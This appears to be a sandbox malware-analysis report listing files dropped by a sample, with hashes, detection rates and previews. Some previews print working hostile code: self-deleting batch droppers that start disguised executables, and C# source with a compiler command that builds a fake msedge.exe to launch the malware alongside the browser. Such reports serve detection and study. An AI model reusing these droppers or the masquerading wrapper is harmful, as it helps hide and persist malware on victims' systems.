                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):180
                                                    Entropy (8bit):5.226824091418245
                                                    Encrypted:false
                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5In5qLyCIvBktKcKZG1Ukh4E2J5xAI8SEGLq:hCRLuVFOOr+DER5In5fBvKOZG1923fxO
                                                    MD5:846A9C4ADFA0E0DBEF3B49D8AC8FD4FA
                                                    SHA1:E683D7A8B1E455CF7E53CBE30769945F5D543231
                                                    SHA-256:0BF19314ED272307A12A2E80E4DAB6CB5893A780DBF727081FA292903A778C4D
                                                    SHA-512:C40C304CA80EE167050E2C150CC2D0480521FAA5E63D330B09B9535A055C83D751613655C483DB2ED8081B5DA2638C315AAA8C16AB7655456C7906987181C8DA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\IZdub348jc.bat"

                                                    C:\Users\user\AppData\Local\Temp\QqKaK8MzOz

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.373660689688185
                                                    Encrypted:false
                                                    SSDEEP:3:VXXXVd5:VnFd5
                                                    MD5:B13523CBB85A5644874AD912D9D2067A
                                                    SHA1:0DDEEF070EBBB972CBD7441DECDF97EC17F482E3
                                                    SHA-256:1C405BF34B045CD5B0C14332297A8CB6132861E5F6567C6961593429619E0607
                                                    SHA-512:051BE495219AB018515D5A037C02059E8673D8346296A37F9E7196CA9EC4358356297135F1EAD06DBAB3C092DA236FDF416BE46C795ABD766C009608768B8DF3
                                                    Malicious:false
                                                    Preview:SQLQOGFf4JCQuBp2g1IzMpxRl

                                                    C:\Users\user\AppData\Local\Temp\RES2144.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Thu Aug 29 22:39:12 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1928
                                                    Entropy (8bit):4.61721999828124
                                                    Encrypted:false
                                                    SSDEEP:24:HTK9AaLz/AAB8HpWwKqxmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ecN:raLz4k8bKqxmslmuulB+hnqXSfbNtmh7
                                                    MD5:15BD07FFB19FE9F308A0D578EBE48FA5
                                                    SHA1:92D4CD296266B7DA5DF815964E4191F6E9F793DE
                                                    SHA-256:41F521A921D98D163FAC63C068851F1C33C37C3840F58FC19A06E5586B09A08D
                                                    SHA-512:EE0ECFC8DADC8B7101BEA4EA88F8EC922047E561F75FCFFE4F0C519BC7007E70FBB13433FB41ADCEA4C259D12E1A813A43F04F6D61D17295903035F0961B5D5A
                                                    Malicious:false
                                                    Preview:L......f.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES2144.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

                                                    C:\Users\user\AppData\Local\Temp\RES22AB.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Aug 29 22:39:12 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1956
                                                    Entropy (8bit):4.552921710688469
                                                    Encrypted:false
                                                    SSDEEP:24:HnO9/OKAVXqH+wKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:5KAlq9KqxmEluOulajfqXSfbNtmh1Z
                                                    MD5:58E3BD35980FBAD0A3E3E7A262F31E76
                                                    SHA1:FF1B1D430A835B6228D8203625F27F9F8ED4054B
                                                    SHA-256:266ABF9D6C4945C3D72FAB86E5A50D16AF1E70C7ADEE1CE1CEBE914167D8007F
                                                    SHA-512:24358D3D23151FB7C558647DF8B387CF8D5B2310D96A961285032C701EA20536D1EB876BD7D740F7F834F9E8A115B2E88B0EA8568CDB33ADE8BB78659CCF8043
                                                    Malicious:false
                                                    Preview:L......f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES22AB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                    C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):224
                                                    Entropy (8bit):5.265590102929044
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1SV+DER5CKvl1vKOZG1923fbwHn:HTg9uYDEfCc/An
                                                    MD5:542C3504160BD006589B414BD76A9DCB
                                                    SHA1:8AEBDC19E5F53D70835D1F7D1AEDF22640424CA1
                                                    SHA-256:93F7E6E6463E3D51CD7B8ECC463B8B99A47DB5717BC83C3FA1120A6612F0DECD
                                                    SHA-512:0787F0BA6FB08F5095C54AE982B7891573BEA4FD098548607A3965C22B59C47865F1E19E0D05D622220C7B836977C0B02D1A4B9C90C16F1A7F3A3CD54C732925
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\U9jP4iZUUm.bat"

                                                    C:\Users\user\AppData\Local\Temp\dfacWBhiVN

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.293660689688185
                                                    Encrypted:false
                                                    SSDEEP:3:Su/zrgETRn:Subpn
                                                    MD5:8B15968ED7C88CA6FD67E0385FE1FEBA
                                                    SHA1:A7390414998E94F95C07596A3A0BC81D4BF2E170
                                                    SHA-256:82241D7451281F4A852497EB721313EACB07EAE57B5273CDF695DED306F86C88
                                                    SHA-512:05FCFE535F5630BB57EE9C3C34619D4EE04F39D40C328117CB11DAF533AF5EC7B931294137A8C9BB4FF1FE64817212719857DBEE4EBBA8A41269E0F5FD195EDA
                                                    Malicious:false
                                                    Preview:g4KZoopNE6minPy0ukmPmBeMf

                                                    C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.0.cs

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):409
                                                    Entropy (8bit):4.996566118785529
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LCcIiFkD:JNVQIbSfhWLzIiFkMSfhWLCclFkD
                                                    MD5:EC9254F4F65F4E1CFAB857FBB5FF59A9
                                                    SHA1:DADB9713603567AF618ED59E47C1E733CBD14ED7
                                                    SHA-256:953343BC31B7A44D934182A809521203992A6FE8C386A873AB611F07EAB09C2B
                                                    SHA-512:2E162DBEF41337EB1AC937EB5F78268A53586FD067FD0A1578FFE751D08A3C6D7036485A6B528F3D97710F6FC15BA7FAC1B2921660A4B8A3B8D3F4E41FD343DC
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"); } catch { } }).Start();. }.}.

                                                    C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):266
                                                    Entropy (8bit):5.1321287867189405
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fYV1ICsH:Hu7L//TRRzscQyw43
                                                    MD5:505C2BAFC07F4D0F88F945BD9B28599E
                                                    SHA1:CD85F62FAC0FB8B68E833B995535FD112B3794CA
                                                    SHA-256:EB46CB4C5BD971384B1A558786CA622BB5A39FB115CC8A8D36E25579F560A12C
                                                    SHA-512:06382C607EDEAB50E9353EF1899379EE3496E5EE2B0F8A4A223DCDDAB2EF6747BDA0D60F004E8E6658D9512CF6F30D29DC15E7145DCE905402749622157656BE
                                                    Malicious:true
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.0.cs"

                                                    C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.out

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):767
                                                    Entropy (8bit):5.250791831718861
                                                    Encrypted:false
                                                    SSDEEP:12:KMi/I/u7L//TRRzscQyw4+KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzstyMKax5DqBVKVrdFAMBt
                                                    MD5:E2642FD4CFD1AF12C259341551AC57DD
                                                    SHA1:AC80860257ED506352389AC1209F7F6A8A983615
                                                    SHA-256:2EDDBC7E4AA8FA7CBF83F0035A62B7C3AF47A7255617CE4C299044D8C8751F20
                                                    SHA-512:C2DFD06E82EE301333F9C6068ED9B51195F9425A4E68F0E48B26EB3EAD670F92A06BC09EE24AA2008D6FCEACB2648A4CA260E64F66B28AA268BC6E9F4B6CDD0E
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                    C:\Users\user\Desktop\CAgBdTQY.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Joe Sandbox View:
                                                    • Filename: ugRGgCJhQl.exe, Detection: malicious, Browse
                                                    • Filename: eCGKhYZtgx.exe, Detection: malicious, Browse
                                                    • Filename: czcgyt.exe, Detection: malicious, Browse
                                                    • Filename: trkfmve.exe, Detection: malicious, Browse
                                                    • Filename: iolZQ9869U.exe, Detection: malicious, Browse
                                                    • Filename: 2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe, Detection: malicious, Browse
                                                    • Filename: jZrY9owO7A.exe, Detection: malicious, Browse
                                                    • Filename: Componentsession.exe, Detection: malicious, Browse
                                                    • Filename: -#U00bc).exe, Detection: malicious, Browse
                                                    • Filename: Loader.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                    C:\Users\user\Desktop\MjzRNvWG.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                    C:\Users\user\Desktop\VLoPWCmN.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\VTXhBlNT.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                    C:\Users\user\Desktop\cPGganVc.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\cfd09d23ba9398

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):62
                                                    Entropy (8bit):5.183640866664016
                                                    Encrypted:false
                                                    SSDEEP:3:jFlPXWa2/Q8RjSMi:jzOBDi
                                                    MD5:1456F967E6B322FA81C31F73CBB61229
                                                    SHA1:7C4A30F62C8352177231B1216B74E7AE3728C46D
                                                    SHA-256:5D0DA1B898487CF23DD7783BDDE813CA5F3B9DA92FB95268061792C7229D9C6F
                                                    SHA-512:A5531161775FDC3AF25729F40CF2BE61B9A9997AAEEEDB8EC81B89943EE0F1F43A81CBCFBD50EAEEDE421746E190758F2D670F8C106A3B3340AA8A4F55598C45
                                                    Malicious:false
                                                    Preview:NsDwiRgJ8Z6iCQ9jXHbLd8749956JBXntf3HNGHapxv4IE5OV7AQkEkPvJwiVk

                                                    C:\Users\user\Desktop\fuHfGerv.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):33792
                                                    Entropy (8bit):5.541771649974822
                                                    Encrypted:false
                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\gwaXxxDZ.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\myawJPbK.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):33792
                                                    Entropy (8bit):5.541771649974822
                                                    Encrypted:false
                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\sTRlxExW.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                    C:\Users\user\Desktop\xxMkqOtN.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
